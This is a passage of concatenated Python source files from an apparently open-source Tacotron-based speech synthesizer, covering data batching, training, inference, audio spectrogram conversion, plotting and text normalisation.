= index[0] mel_path, embed_path = self.samples_fpaths[index] mel = np.load(mel_path).T.astype(np.float32) # Load the embed embed = np.load(embed_path) # Get the text and clean it text = text_to_sequence(self.samples_texts[index], self.hparams.tts_cleaner_names) # Convert the list returned by text_to_sequence to a numpy array text = np.asarray(text).astype(np.int32) return text, mel.astype(np.float32), embed.astype(np.float32), index def __len__(self): return len(self.samples_fpaths) def collate_synthesizer(batch, r, hparams): # Text x_lens = [len(x[0]) for x in batch] max_x_len = max(x_lens) chars = [pad1d(x[0], max_x_len) for x in batch] chars = np.stack(chars) # Mel spectrogram spec_lens = [x[1].shape[-1] for x in batch] max_spec_len = max(spec_lens) + 1 if max_spec_len % r != 0: max_spec_len += r - max_spec_len % r # WaveRNN mel spectrograms are normalized to [0, 1] so zero padding adds silence # By default, SV2TTS uses symmetric mels, where -1*max_abs_value is silence. if hparams.symmetric_mels: mel_pad_value = -1 * hparams.max_abs_value else: mel_pad_value = 0 mel = [pad2d(x[1], max_spec_len, pad_value=mel_pad_value) for x in batch] mel = np.stack(mel) # Speaker embedding (SV2TTS) embeds = np.array([x[2] for x in batch]) # Index (for vocoder preprocessing) indices = [x[3] for x in batch] # Convert all to tensor chars = torch.tensor(chars).long() mel = torch.tensor(mel) embeds = torch.tensor(embeds) return chars, mel, embeds, indices def pad1d(x, max_len, pad_value=0): return np.pad(x, (0, max_len - len(x)), mode="constant", constant_values=pad_value) def pad2d(x, max_len, pad_value=0): return np.pad(x, ((0, 0), (0, max_len - x.shape[-1])), mode="constant", constant_values=pad_value) File: synthesizer/__init__.py # File: synthesizer/synthesize.py import platform from functools import partial from pathlib import Path import numpy as np import torch from torch.utils.data import DataLoader from tqdm import tqdm from synthesizer.hparams import hparams_debug_string from synthesizer.models.tacotron import Tacotron from synthesizer.synthesizer_dataset import SynthesizerDataset, collate_synthesizer from synthesizer.utils import data_parallel_workaround from synthesizer.utils.symbols import symbols def run_synthesis(in_dir: Path, out_dir: Path, syn_model_fpath: Path, hparams): # This generates ground truth-aligned mels for vocoder training synth_dir = out_dir / "mels_gta" synth_dir.mkdir(exist_ok=True, parents=True) print(hparams_debug_string()) # Check for GPU if torch.cuda.is_available(): device = torch.device("cuda") if hparams.synthesis_batch_size % torch.cuda.device_count() != 0: raise ValueError("`hparams.synthesis_batch_size` must be evenly divisible by n_gpus!") else: device = torch.device("cpu") print("Synthesizer using device:", device) # Instantiate Tacotron model model = Tacotron(embed_dims=hparams.tts_embed_dims, num_chars=len(symbols), encoder_dims=hparams.tts_encoder_dims, decoder_dims=hparams.tts_decoder_dims, n_mels=hparams.num_mels, fft_bins=hparams.num_mels, postnet_dims=hparams.tts_postnet_dims, encoder_K=hparams.tts_encoder_K, lstm_dims=hparams.tts_lstm_dims, postnet_K=hparams.tts_postnet_K, num_highways=hparams.tts_num_highways, dropout=0., # Use zero dropout for gta mels stop_threshold=hparams.tts_stop_threshold, speaker_embedding_size=hparams.speaker_embedding_size).to(device) # Load the weights print("\nLoading weights at %s" % syn_model_fpath) model.load(syn_model_fpath) print("Tacotron weights loaded from step %d" % model.step) # Synthesize using same reduction factor as the model is currently trained r = np.int32(model.r) # Set model to eval mode (disable gradient and zoneout) model.eval() # Initialize the dataset metadata_fpath = in_dir.joinpath("train.txt") mel_dir = in_dir.joinpath("mels") embed_dir = in_dir.joinpath("embeds") dataset = SynthesizerDataset(metadata_fpath, mel_dir, embed_dir, hparams) collate_fn = partial(collate_synthesizer, r=r, hparams=hparams) data_loader = DataLoader(dataset, hparams.synthesis_batch_size, collate_fn=collate_fn, num_workers=2) # Generate GTA mels meta_out_fpath = out_dir / "synthesized.txt" with meta_out_fpath.open("w") as file: for i, (texts, mels, embeds, idx) in tqdm(enumerate(data_loader), total=len(data_loader)): texts, mels, embeds = texts.to(device), mels.to(device), embeds.to(device) # Parallelize model onto GPUS using workaround due to python bug if device.type == "cuda" and torch.cuda.device_count() > 1: _, mels_out, _ = data_parallel_workaround(model, texts, mels, embeds) else: _, mels_out, _, _ = model(texts, mels, embeds) for j, k in enumerate(idx): # Note: outputs mel-spectrogram files and target ones have same names, just different folders mel_filename = Path(synth_dir).joinpath(dataset.metadata[k][1]) mel_out = mels_out[j].detach().cpu().numpy().T # Use the length of the ground truth mel to remove padding from the generated mels mel_out = mel_out[:int(dataset.metadata[k][4])] # Write the spectrogram to disk np.save(mel_filename, mel_out, allow_pickle=False) # Write metadata into the synthesized file file.write("|".join(dataset.metadata[k])) File: synthesizer/train.py from datetime import datetime from functools import partial from pathlib import Path import torch import torch.nn.functional as F from torch import optim from torch.utils.data import DataLoader from synthesizer import audio from synthesizer.models.tacotron import Tacotron from synthesizer.synthesizer_dataset import SynthesizerDataset, collate_synthesizer from synthesizer.utils import ValueWindow, data_parallel_workaround from synthesizer.utils.plot import plot_spectrogram from synthesizer.utils.symbols import symbols from synthesizer.utils.text import sequence_to_text from vocoder.display import * def np_now(x: torch.Tensor): return x.detach().cpu().numpy() def time_string(): return datetime.now().strftime("%Y-%m-%d %H:%M") def train(run_id: str, syn_dir: Path, models_dir: Path, save_every: int, backup_every: int, force_restart: bool, hparams): models_dir.mkdir(exist_ok=True) model_dir = models_dir.joinpath(run_id) plot_dir = model_dir.joinpath("plots") wav_dir = model_dir.joinpath("wavs") mel_output_dir = model_dir.joinpath("mel-spectrograms") meta_folder = model_dir.joinpath("metas") model_dir.mkdir(exist_ok=True) plot_dir.mkdir(exist_ok=True) wav_dir.mkdir(exist_ok=True) mel_output_dir.mkdir(exist_ok=True) meta_folder.mkdir(exist_ok=True) weights_fpath = model_dir / f"synthesizer.pt" metadata_fpath = syn_dir.joinpath("train.txt") print("Checkpoint path: {}".format(weights_fpath)) print("Loading training data from: {}".format(metadata_fpath)) print("Using model: Tacotron") # Bookkeeping time_window = ValueWindow(100) loss_window = ValueWindow(100) # From WaveRNN/train_tacotron.py if torch.cuda.is_available(): device = torch.device("cuda") for session in hparams.tts_schedule: _, _, _, batch_size = session if batch_size % torch.cuda.device_count() != 0: raise ValueError("`batch_size` must be evenly divisible by n_gpus!") else: device = torch.device("cpu") print("Using device:", device) # Instantiate Tacotron Model print("\nInitialising Tacotron Model...\n") model = Tacotron(embed_dims=hparams.tts_embed_dims, num_chars=len(symbols), encoder_dims=hparams.tts_encoder_dims, decoder_dims=hparams.tts_decoder_dims, n_mels=hparams.num_mels, fft_bins=hparams.num_mels, postnet_dims=hparams.tts_postnet_dims, encoder_K=hparams.tts_encoder_K, lstm_dims=hparams.tts_lstm_dims, postnet_K=hparams.tts_postnet_K, num_highways=hparams.tts_num_highways, dropout=hparams.tts_dropout, stop_threshold=hparams.tts_stop_threshold, speaker_embedding_size=hparams.speaker_embedding_size).to(device) # Initialize the optimizer optimizer = optim.Adam(model.parameters()) # Load the weights if force_restart or not weights_fpath.exists(): print("\nStarting the training of Tacotron from scratch\n") model.save(weights_fpath) # Embeddings metadata char_embedding_fpath = meta_folder.joinpath("CharacterEmbeddings.tsv") with open(char_embedding_fpath, "w", encoding="utf-8") as f: for symbol in symbols: if symbol == " ": symbol = "\\s" # For visual purposes, swap space with \s f.write("{}\n".format(symbol)) else: print("\nLoading weights at %s" % weights_fpath) model.load(weights_fpath, optimizer) print("Tacotron weights loaded from step %d" % model.step) # Initialize the dataset metadata_fpath = syn_dir.joinpath("train.txt") mel_dir = syn_dir.joinpath("mels") embed_dir = syn_dir.joinpath("embeds") dataset = SynthesizerDataset(metadata_fpath, mel_dir, embed_dir, hparams) for i, session in enumerate(hparams.tts_schedule): current_step = model.get_step() r, lr, max_step, batch_size = session training_steps = max_step - current_step # Do we need to change to the next session? if current_step >= max_step: # Are there no further sessions than the current one? if i == len(hparams.tts_schedule) - 1: # We have completed training. Save the model and exit model.save(weights_fpath, optimizer) break else: # There is a following session, go to it continue model.r = r # Begin the training simple_table([(f"Steps with r={r}", str(training_steps // 1000) + "k Steps"), ("Batch Size", batch_size), ("Learning Rate", lr), ("Outputs/Step (r)", model.r)]) for p in optimizer.param_groups: p["lr"] = lr collate_fn = partial(collate_synthesizer, r=r, hparams=hparams) data_loader = DataLoader(dataset, batch_size, shuffle=True, num_workers=2, collate_fn=collate_fn) total_iters = len(dataset) steps_per_epoch = np.ceil(total_iters / batch_size).astype(np.int32) epochs = np.ceil(training_steps / steps_per_epoch).astype(np.int32) for epoch in range(1, epochs+1): for i, (texts, mels, embeds, idx) in enumerate(data_loader, 1): start_time = time.time() # Generate stop tokens for training stop = torch.ones(mels.shape[0], mels.shape[2]) for j, k in enumerate(idx): stop[j, :int(dataset.metadata[k][4])-1] = 0 texts = texts.to(device) mels = mels.to(device) embeds = embeds.to(device) stop = stop.to(device) # Forward pass # Parallelize model onto GPUS using workaround due to python bug if device.type == "cuda" and torch.cuda.device_count() > 1: m1_hat, m2_hat, attention, stop_pred = data_parallel_workaround(model, texts, mels, embeds) else: m1_hat, m2_hat, attention, stop_pred = model(texts, mels, embeds) # Backward pass m1_loss = F.mse_loss(m1_hat, mels) + F.l1_loss(m1_hat, mels) m2_loss = F.mse_loss(m2_hat, mels) stop_loss = F.binary_cross_entropy(stop_pred, stop) loss = m1_loss + m2_loss + stop_loss optimizer.zero_grad() loss.backward() if hparams.tts_clip_grad_norm is not None: grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), hparams.tts_clip_grad_norm) if np.isnan(grad_norm.cpu()): print("grad_norm was NaN!") optimizer.step() time_window.append(time.time() - start_time) loss_window.append(loss.item()) step = model.get_step() k = step // 1000 msg = f"| Epoch: {epoch}/{epochs} ({i}/{steps_per_epoch}) | Loss: {loss_window.average:#.4} | " \ f"{1./time_window.average:#.2} steps/s | Step: {k}k | " stream(msg) # Backup or save model as appropriate if backup_every != 0 and step % backup_every == 0 : backup_fpath = weights_fpath.parent / f"synthesizer_{k:06d}.pt" model.save(backup_fpath, optimizer) if save_every != 0 and step % save_every == 0 : # Must save latest optimizer state to ensure that resuming training # doesn't produce artifacts model.save(weights_fpath, optimizer) # Evaluate model to generate samples epoch_eval = hparams.tts_eval_interval == -1 and i == steps_per_epoch # If epoch is done step_eval = hparams.tts_eval_interval > 0 and step % hparams.tts_eval_interval == 0 # Every N steps if epoch_eval or step_eval: for sample_idx in range(hparams.tts_eval_num_samples): # At most, generate samples equal to number in the batch if sample_idx + 1 <= len(texts): # Remove padding from mels using frame length in metadata mel_length = int(dataset.metadata[idx[sample_idx]][4]) mel_prediction = np_now(m2_hat[sample_idx]).T[:mel_length] target_spectrogram = np_now(mels[sample_idx]).T[:mel_length] attention_len = mel_length // model.r eval_model(attention=np_now(attention[sample_idx][:, :attention_len]), mel_prediction=mel_prediction, target_spectrogram=target_spectrogram, input_seq=np_now(texts[sample_idx]), step=step, plot_dir=plot_dir, mel_output_dir=mel_output_dir, wav_dir=wav_dir, sample_num=sample_idx + 1, loss=loss, hparams=hparams) # Break out of loop to update training schedule if step >= max_step: break # Add line break after every epoch print("") def eval_model(attention, mel_prediction, target_spectrogram, input_seq, step, plot_dir, mel_output_dir, wav_dir, sample_num, loss, hparams): # Save some results for evaluation attention_path = str(plot_dir.joinpath("attention_step_{}_sample_{}".format(step, sample_num))) save_attention(attention, attention_path) # save predicted mel spectrogram to disk (debug) mel_output_fpath = mel_output_dir.joinpath("mel-prediction-step-{}_sample_{}.npy".format(step, sample_num)) np.save(str(mel_output_fpath), mel_prediction, allow_pickle=False) # save griffin lim inverted wav for debug (mel -> wav) wav = audio.inv_mel_spectrogram(mel_prediction.T, hparams) wav_fpath = wav_dir.joinpath("step-{}-wave-from-mel_sample_{}.wav".format(step, sample_num)) audio.save_wav(wav, str(wav_fpath), sr=hparams.sample_rate) # save real and predicted mel-spectrogram plot to disk (control purposes) spec_fpath = plot_dir.joinpath("step-{}-mel-spectrogram_sample_{}.png".format(step, sample_num)) title_str = "{}, {}, step={}, loss={:.5f}".format("Tacotron", time_string(), step, loss) plot_spectrogram(mel_prediction, str(spec_fpath), title=title_str, target_spectrogram=target_spectrogram, max_len=target_spectrogram.size // hparams.num_mels) print("Input at step {}: {}".format(step, sequence_to_text(input_seq))) File: synthesizer/inference.py import torch from synthesizer import audio from synthesizer.hparams import hparams from synthesizer.models.tacotron import Tacotron from synthesizer.utils.symbols import symbols from synthesizer.utils.text import text_to_sequence from vocoder.display import simple_table from pathlib import Path from typing import Union, List import numpy as np import librosa class Synthesizer: sample_rate = hparams.sample_rate hparams = hparams def __init__(self, model_fpath: Path, verbose=True): """ The model isn't instantiated and loaded in memory until needed or until load() is called. :param model_fpath: path to the trained model file :param verbose: if False, prints less information when using the model """ self.model_fpath = model_fpath self.verbose = verbose # Check for GPU if torch.cuda.is_available(): self.device = torch.device("cuda") else: self.device = torch.device("cpu") if self.verbose: print("Synthesizer using device:", self.device) # Tacotron model will be instantiated later on first use. self._model = None def is_loaded(self): """ Whether the model is loaded in memory. """ return self._model is not None def load(self): """ Instantiates and loads the model given the weights file that was passed in the constructor. """ self._model = Tacotron(embed_dims=hparams.tts_embed_dims, num_chars=len(symbols), encoder_dims=hparams.tts_encoder_dims, decoder_dims=hparams.tts_decoder_dims, n_mels=hparams.num_mels, fft_bins=hparams.num_mels, postnet_dims=hparams.tts_postnet_dims, encoder_K=hparams.tts_encoder_K, lstm_dims=hparams.tts_lstm_dims, postnet_K=hparams.tts_postnet_K, num_highways=hparams.tts_num_highways, dropout=hparams.tts_dropout, stop_threshold=hparams.tts_stop_threshold, speaker_embedding_size=hparams.speaker_embedding_size).to(self.device) self._model.load(self.model_fpath) self._model.eval() if self.verbose: print("Loaded synthesizer \"%s\" trained to step %d" % (self.model_fpath.name, self._model.state_dict()["step"])) def synthesize_spectrograms(self, texts: List[str], embeddings: Union[np.ndarray, List[np.ndarray]], return_alignments=False): """ Synthesizes mel spectrograms from texts and speaker embeddings. :param texts: a list of N text prompts to be synthesized :param embeddings: a numpy array or list of speaker embeddings of shape (N, 256) :param return_alignments: if True, a matrix representing the alignments between the characters and each decoder output step will be returned for each spectrogram :return: a list of N melspectrograms as numpy arrays of shape (80, Mi), where Mi is the sequence length of spectrogram i, and possibly the alignments. """ # Load the model on the first request. if not self.is_loaded(): self.load() # Preprocess text inputs inputs = [text_to_sequence(text.strip(), hparams.tts_cleaner_names) for text in texts] if not isinstance(embeddings, list): embeddings = [embeddings] # Batch inputs batched_inputs = [inputs[i:i+hparams.synthesis_batch_size] for i in range(0, len(inputs), hparams.synthesis_batch_size)] batched_embeds = [embeddings[i:i+hparams.synthesis_batch_size] for i in range(0, len(embeddings), hparams.synthesis_batch_size)] specs = [] for i, batch in enumerate(batched_inputs, 1): if self.verbose: print(f"\n| Generating {i}/{len(batched_inputs)}") # Pad texts so they are all the same length text_lens = [len(text) for text in batch] max_text_len = max(text_lens) chars = [pad1d(text, max_text_len) for text in batch] chars = np.stack(chars) # Stack speaker embeddings into 2D array for batch processing speaker_embeds = np.stack(batched_embeds[i-1]) # Convert to tensor chars = torch.tensor(chars).long().to(self.device) speaker_embeddings = torch.tensor(speaker_embeds).float().to(self.device) # Inference _, mels, alignments = self._model.generate(chars, speaker_embeddings) mels = mels.detach().cpu().numpy() for m in mels: # Trim silence from end of each spectrogram while np.max(m[:, -1]) < hparams.tts_stop_threshold: m = m[:, :-1] specs.append(m) if self.verbose: print("\n\nDone.\n") return (specs, alignments) if return_alignments else specs @staticmethod def load_preprocess_wav(fpath): """ Loads and preprocesses an audio file under the same conditions the audio files were used to train the synthesizer. """ wav = librosa.load(str(fpath), hparams.sample_rate)[0] if hparams.rescale: wav = wav / np.abs(wav).max() * hparams.rescaling_max return wav @staticmethod def make_spectrogram(fpath_or_wav: Union[str, Path, np.ndarray]): """ Creates a mel spectrogram from an audio file in the same manner as the mel spectrograms that were fed to the synthesizer when training. """ if isinstance(fpath_or_wav, str) or isinstance(fpath_or_wav, Path): wav = Synthesizer.load_preprocess_wav(fpath_or_wav) else: wav = fpath_or_wav mel_spectrogram = audio.melspectrogram(wav, hparams).astype(np.float32) return mel_spectrogram @staticmethod def griffin_lim(mel): """ Inverts a mel spectrogram using Griffin-Lim. The mel spectrogram is expected to have been built with the same parameters present in hparams.py. """ return audio.inv_mel_spectrogram(mel, hparams) def pad1d(x, max_len, pad_value=0): return np.pad(x, (0, max_len - len(x)), mode="constant", constant_values=pad_value) File: synthesizer/audio.py import librosa import librosa.filters import numpy as np from scipy import signal from scipy.io import wavfile import soundfile as sf def load_wav(path, sr): return librosa.core.load(path, sr=sr)[0] def save_wav(wav, path, sr): wav *= 32767 / max(0.01, np.max(np.abs(wav))) #proposed by @dsmiller wavfile.write(path, sr, wav.astype(np.int16)) def save_wavenet_wav(wav, path, sr): sf.write(path, wav.astype(np.float32), sr) def preemphasis(wav, k, preemphasize=True): if preemphasize: return signal.lfilter([1, -k], [1], wav) return wav def inv_preemphasis(wav, k, inv_preemphasize=True): if inv_preemphasize: return signal.lfilter([1], [1, -k], wav) return wav #From https://github.com/r9y9/wavenet_vocoder/blob/master/audio.py def start_and_end_indices(quantized, silence_threshold=2): for start in range(quantized.size): if abs(quantized[start] - 127) > silence_threshold: break for end in range(quantized.size - 1, 1, -1): if abs(quantized[end] - 127) > silence_threshold: break assert abs(quantized[start] - 127) > silence_threshold assert abs(quantized[end] - 127) > silence_threshold return start, end def get_hop_size(hparams): hop_size = hparams.hop_size if hop_size is None: assert hparams.frame_shift_ms is not None hop_size = int(hparams.frame_shift_ms / 1000 * hparams.sample_rate) return hop_size def linearspectrogram(wav, hparams): D = _stft(preemphasis(wav, hparams.preemphasis, hparams.preemphasize), hparams) S = _amp_to_db(np.abs(D), hparams) - hparams.ref_level_db if hparams.signal_normalization: return _normalize(S, hparams) return S def melspectrogram(wav, hparams): D = _stft(preemphasis(wav, hparams.preemphasis, hparams.preemphasize), hparams) S = _amp_to_db(_linear_to_mel(np.abs(D), hparams), hparams) - hparams.ref_level_db if hparams.signal_normalization: return _normalize(S, hparams) return S def inv_linear_spectrogram(linear_spectrogram, hparams): """Converts linear spectrogram to waveform using librosa""" if hparams.signal_normalization: D = _denormalize(linear_spectrogram, hparams) else: D = linear_spectrogram S = _db_to_amp(D + hparams.ref_level_db) #Convert back to linear if hparams.use_lws: processor = _lws_processor(hparams) D = processor.run_lws(S.astype(np.float64).T ** hparams.power) y = processor.istft(D).astype(np.float32) return inv_preemphasis(y, hparams.preemphasis, hparams.preemphasize) else: return inv_preemphasis(_griffin_lim(S ** hparams.power, hparams), hparams.preemphasis, hparams.preemphasize) def inv_mel_spectrogram(mel_spectrogram, hparams): """Converts mel spectrogram to waveform using librosa""" if hparams.signal_normalization: D = _denormalize(mel_spectrogram, hparams) else: D = mel_spectrogram S = _mel_to_linear(_db_to_amp(D + hparams.ref_level_db), hparams) # Convert back to linear if hparams.use_lws: processor = _lws_processor(hparams) D = processor.run_lws(S.astype(np.float64).T ** hparams.power) y = processor.istft(D).astype(np.float32) return inv_preemphasis(y, hparams.preemphasis, hparams.preemphasize) else: return inv_preemphasis(_griffin_lim(S ** hparams.power, hparams), hparams.preemphasis, hparams.preemphasize) def _lws_processor(hparams): import lws return lws.lws(hparams.n_fft, get_hop_size(hparams), fftsize=hparams.win_size, mode="speech") def _griffin_lim(S, hparams): """librosa implementation of Griffin-Lim Based on https://github.com/librosa/librosa/issues/434 """ angles = np.exp(2j * np.pi * np.random.rand(*S.shape)) S_complex = np.abs(S).astype(np.complex) y = _istft(S_complex * angles, hparams) for i in range(hparams.griffin_lim_iters): angles = np.exp(1j * np.angle(_stft(y, hparams))) y = _istft(S_complex * angles, hparams) return y def _stft(y, hparams): if hparams.use_lws: return _lws_processor(hparams).stft(y).T else: return librosa.stft(y=y, n_fft=hparams.n_fft, hop_length=get_hop_size(hparams), win_length=hparams.win_size) def _istft(y, hparams): return librosa.istft(y, hop_length=get_hop_size(hparams), win_length=hparams.win_size) ########################################################## #Those are only correct when using lws!!! (This was messing with Wavenet quality for a long time!) def num_frames(length, fsize, fshift): """Compute number of time frames of spectrogram """ pad = (fsize - fshift) if length % fshift == 0: M = (length + pad * 2 - fsize) // fshift + 1 else: M = (length + pad * 2 - fsize) // fshift + 2 return M def pad_lr(x, fsize, fshift): """Compute left and right padding """ M = num_frames(len(x), fsize, fshift) pad = (fsize - fshift) T = len(x) + 2 * pad r = (M - 1) * fshift + fsize - T return pad, pad + r ########################################################## #Librosa correct padding def librosa_pad_lr(x, fsize, fshift): return 0, (x.shape[0] // fshift + 1) * fshift - x.shape[0] # Conversions _mel_basis = None _inv_mel_basis = None def _linear_to_mel(spectogram, hparams): global _mel_basis if _mel_basis is None: _mel_basis = _build_mel_basis(hparams) return np.dot(_mel_basis, spectogram) def _mel_to_linear(mel_spectrogram, hparams): global _inv_mel_basis if _inv_mel_basis is None: _inv_mel_basis = np.linalg.pinv(_build_mel_basis(hparams)) return np.maximum(1e-10, np.dot(_inv_mel_basis, mel_spectrogram)) def _build_mel_basis(hparams): assert hparams.fmax <= hparams.sample_rate // 2 return librosa.filters.mel(hparams.sample_rate, hparams.n_fft, n_mels=hparams.num_mels, fmin=hparams.fmin, fmax=hparams.fmax) def _amp_to_db(x, hparams): min_level = np.exp(hparams.min_level_db / 20 * np.log(10)) return 20 * np.log10(np.maximum(min_level, x)) def _db_to_amp(x): return np.power(10.0, (x) * 0.05) def _normalize(S, hparams): if hparams.allow_clipping_in_normalization: if hparams.symmetric_mels: return np.clip((2 * hparams.max_abs_value) * ((S - hparams.min_level_db) / (-hparams.min_level_db)) - hparams.max_abs_value, -hparams.max_abs_value, hparams.max_abs_value) else: return np.clip(hparams.max_abs_value * ((S - hparams.min_level_db) / (-hparams.min_level_db)), 0, hparams.max_abs_value) assert S.max() <= 0 and S.min() - hparams.min_level_db >= 0 if hparams.symmetric_mels: return (2 * hparams.max_abs_value) * ((S - hparams.min_level_db) / (-hparams.min_level_db)) - hparams.max_abs_value else: return hparams.max_abs_value * ((S - hparams.min_level_db) / (-hparams.min_level_db)) def _denormalize(D, hparams): if hparams.allow_clipping_in_normalization: if hparams.symmetric_mels: return (((np.clip(D, -hparams.max_abs_value, hparams.max_abs_value) + hparams.max_abs_value) * -hparams.min_level_db / (2 * hparams.max_abs_value)) + hparams.min_level_db) else: return ((np.clip(D, 0, hparams.max_abs_value) * -hparams.min_level_db / hparams.max_abs_value) + hparams.min_level_db) if hparams.symmetric_mels: return (((D + hparams.max_abs_value) * -hparams.min_level_db / (2 * hparams.max_abs_value)) + hparams.min_level_db) else: return ((D * -hparams.min_level_db / hparams.max_abs_value) + hparams.min_level_db) File: synthesizer/utils/plot.py import numpy as np def split_title_line(title_text, max_words=5): """ A function that splits any string based on specific character (returning it with the string), with maximum number of words on it """ seq = title_text.split() return "\n".join([" ".join(seq[i:i + max_words]) for i in range(0, len(seq), max_words)]) def plot_alignment(alignment, path, title=None, split_title=False, max_len=None): import matplotlib matplotlib.use("Agg") import matplotlib.pyplot as plt if max_len is not None: alignment = alignment[:, :max_len] fig = plt.figure(figsize=(8, 6)) ax = fig.add_subplot(111) im = ax.imshow( alignment, aspect="auto", origin="lower", interpolation="none") fig.colorbar(im, ax=ax) xlabel = "Decoder timestep" if split_title: title = split_title_line(title) plt.xlabel(xlabel) plt.title(title) plt.ylabel("Encoder timestep") plt.tight_layout() plt.savefig(path, format="png") plt.close() def plot_spectrogram(pred_spectrogram, path, title=None, split_title=False, target_spectrogram=None, max_len=None, auto_aspect=False): import matplotlib matplotlib.use("Agg") import matplotlib.pyplot as plt if max_len is not None: target_spectrogram = target_spectrogram[:max_len] pred_spectrogram = pred_spectrogram[:max_len] if split_title: title = split_title_line(title) fig = plt.figure(figsize=(10, 8)) # Set common labels fig.text(0.5, 0.18, title, horizontalalignment="center", fontsize=16) #target spectrogram subplot if target_spectrogram is not None: ax1 = fig.add_subplot(311) ax2 = fig.add_subplot(312) if auto_aspect: im = ax1.imshow(np.rot90(target_spectrogram), aspect="auto", interpolation="none") else: im = ax1.imshow(np.rot90(target_spectrogram), interpolation="none") ax1.set_title("Target Mel-Spectrogram") fig.colorbar(mappable=im, shrink=0.65, orientation="horizontal", ax=ax1) ax2.set_title("Predicted Mel-Spectrogram") else: ax2 = fig.add_subplot(211) if auto_aspect: im = ax2.imshow(np.rot90(pred_spectrogram), aspect="auto", interpolation="none") else: im = ax2.imshow(np.rot90(pred_spectrogram), interpolation="none") fig.colorbar(mappable=im, shrink=0.65, orientation="horizontal", ax=ax2) plt.tight_layout() plt.savefig(path, format="png") plt.close() File: synthesizer/utils/_cmudict.py import re valid_symbols = [ "AA", "AA0", "AA1", "AA2", "AE", "AE0", "AE1", "AE2", "AH", "AH0", "AH1", "AH2", "AO", "AO0", "AO1", "AO2", "AW", "AW0", "AW1", "AW2", "AY", "AY0", "AY1", "AY2", "B", "CH", "D", "DH", "EH", "EH0", "EH1", "EH2", "ER", "ER0", "ER1", "ER2", "EY", "EY0", "EY1", "EY2", "F", "G", "HH", "IH", "IH0", "IH1", "IH2", "IY", "IY0", "IY1", "IY2", "JH", "K", "L", "M", "N", "NG", "OW", "OW0", "OW1", "OW2", "OY", "OY0", "OY1", "OY2", "P", "R", "S", "SH", "T", "TH", "UH", "UH0", "UH1", "UH2", "UW", "UW0", "UW1", "UW2", "V", "W", "Y", "Z", "ZH" ] _valid_symbol_set = set(valid_symbols) class CMUDict: """Thin wrapper around CMUDict data. http://www.speech.cs.cmu.edu/cgi-bin/cmudict""" def __init__(self, file_or_path, keep_ambiguous=True): if isinstance(file_or_path, str): with open(file_or_path, encoding="latin-1") as f: entries = _parse_cmudict(f) else: entries = _parse_cmudict(file_or_path) if not keep_ambiguous: entries = {word: pron for word, pron in entries.items() if len(pron) == 1} self._entries = entries def __len__(self): return len(self._entries) def lookup(self, word): """Returns list of ARPAbet pronunciations of the given word.""" return self._entries.get(word.upper()) _alt_re = re.compile(r"\([0-9]+\)") def _parse_cmudict(file): cmudict = {} for line in file: if len(line) and (line[0] >= "A" and line[0] <= "Z" or line[0] == "'"): parts = line.split(" ") word = re.sub(_alt_re, "", parts[0]) pronunciation = _get_pronunciation(parts[1]) if pronunciation: if word in cmudict: cmudict[word].append(pronunciation) else: cmudict[word] = [pronunciation] return cmudict def _get_pronunciation(s): parts = s.strip().split(" ") for part in parts: if part not in _valid_symbol_set: return None return " ".join(parts) File: synthesizer/utils/__init__.py import torch _output_ref = None _replicas_ref = None def data_parallel_workaround(model, *input): global _output_ref global _replicas_ref device_ids = list(range(torch.cuda.device_count())) output_device = device_ids[0] replicas = torch.nn.parallel.replicate(model, device_ids) # input.shape = (num_args, batch, ...) inputs = torch.nn.parallel.scatter(input, device_ids) # inputs.shape = (num_gpus, num_args, batch/num_gpus, ...) replicas = replicas[:len(inputs)] outputs = torch.nn.parallel.parallel_apply(replicas, inputs) y_hat = torch.nn.parallel.gather(outputs, output_device) _output_ref = outputs _replicas_ref = replicas return y_hat class ValueWindow(): def __init__(self, window_size=100): self._window_size = window_size self._values = [] def append(self, x): self._values = self._values[-(self._window_size - 1):] + [x] @property def sum(self): return sum(self._values) @property def count(self): return len(self._values) @property def average(self): return self.sum / max(1, self.count) def reset(self): self._values = [] File: synthesizer/utils/numbers.py import re import inflect _inflect = inflect.engine() _comma_number_re = re.compile(r"([0-9][0-9\,]+[0-9])") _decimal_number_re = re.compile(r"([0-9]+\.[0-9]+)") _pounds_re = re.compile(r"£([0-9\,]*[0-9]+)") _dollars_re = re.compile(r"\$([0-9\.\,]*[0-9]+)") _ordinal_re = re.compile(r"[0-9]+(st|nd|rd|th)") _number_re = re.compile(r"[0-9]+") def _remove_commas(m): return m.group(1).replace(",", "") def _expand_decimal_point(m): return m.group(1).replace(".", " point ") def _expand_dollars(m): match = m.group(1) parts = match.split(".") if len(parts) > 2: return match + " dollars" # Unexpected format dollars = int(parts[0]) if parts[0] else 0 cents = int(parts[1]) if len(parts) > 1 and parts[1] else 0 if dollars and cents: dollar_unit = "dollar" if dollars == 1 else "dollars" cent_unit = "cent" if cents == 1 else "cents" return "%s %s, %s %s" % (dollars, dollar_unit, cents, cent_unit) elif dollars: dollar_unit = "dollar" if dollars == 1 else "dollars" return "%s %s" % (dollars, dollar_unit) elif cents: cent_unit = "cent" if cents == 1 else "cents" return "%s %s" % (cents, cent_unit) else: return "zero dollars" def _expand_ordinal(m): return _inflect.number_to_words(m.group(0)) def _expand_number(m): num = int(m.group(0)) if num > 1000 and num < 3000: if num == 2000: return "two thousand" elif num > 2000 and num < 2010: return "two thousand " + _inflect.number_to_words(num % 100) elif num % 100 == 0: return _inflect.number_to_words(num // 100) + " hundred" else: return _inflect.number_to_words(num, andword="", zero="oh", group=2).replace(", ", " ") else: return _inflect.number_to_words(num, andword="") def normalize_numbers(text): text = re.sub(_comma_number_re, _remove_commas, text) text = re.sub(_pounds_re, r"\1 pounds", text) text = re.sub(_dollars_re, _expand_dollars, text) text = re.sub(_decimal_number_re, _expand_decimal_point, text) text = re.sub(_ordinal_re, _expand_ordinal, text) text = re.sub(_number_re, _expand_number, text) return text File: synthesizer/utils/symbols.py """ Defines the set of symbols used in text input to the model. The default is a set of ASCII characters that works well for English or text that has been run through Unidecode. For other data, you can modify _characters. See TRAINING_DATA.md for details. """ # from . import cmudict _pad = "_" _eos = "~" _characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!\'\"(),-.:;? " # Prepend "@" to ARPAbet symbols to ensure uniqueness (some are the same as uppercase letters): #_arpabet = ["@' + s for s in cmudict.valid_symbols] # Export all symbols: symbols = [_pad, _eos] + list(_characters) #+ _arpabet File: synthesizer/utils/text.py from synthesizer.utils.symbols import symbols from synthesizer.utils import cleaners import re # Mappings from symbol to numeric ID and vice versa: _symbol_to_id = {s: i for i, s in enumerate(symbols)} _id_to_symbol = {i: s for i, 